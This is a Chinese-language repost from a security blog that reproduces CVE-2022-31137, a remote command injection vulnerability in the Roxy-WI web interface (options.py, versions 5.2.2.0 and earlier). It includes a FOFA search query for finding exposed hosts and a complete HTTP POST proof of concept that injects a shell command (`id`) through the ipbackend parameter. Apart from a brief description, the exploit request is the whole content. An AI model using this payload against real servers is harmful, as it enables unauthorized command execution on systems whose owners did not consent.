Roxy-Wi options.py 远程命令执行漏洞 CVE-2022-31137

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 Roxy-Wi options.py 远程命令执行漏洞 CVE-2022-31137

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

Roxy-WI是用于管理Haproxy、Nginx和Keepalived服务器的Web界面。Roxy-WI 5.2.2.0及更早版本存在命令注入漏洞。攻击者可通过options.py利用该漏洞进行命令注入攻击。

图片[1]-Roxy-Wi options.py 远程命令执行漏洞 CVE-2022-31137-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

fofaapp=”HAProxy-WI”

1.执行的POC,得到执行id命令的回显


POST /app/options.py HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Content-Length: 91
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
DNT: 1
Upgrade-Insecure-Requests: 1

alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bid+%23%23&backend_server=127.0.0.1
图片[2]-Roxy-Wi options.py 远程命令执行漏洞 CVE-2022-31137-渗透云记 - 专注于网络安全与技术分享
© 版权声明
THE END
喜欢就支持一下吧
点赞8 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容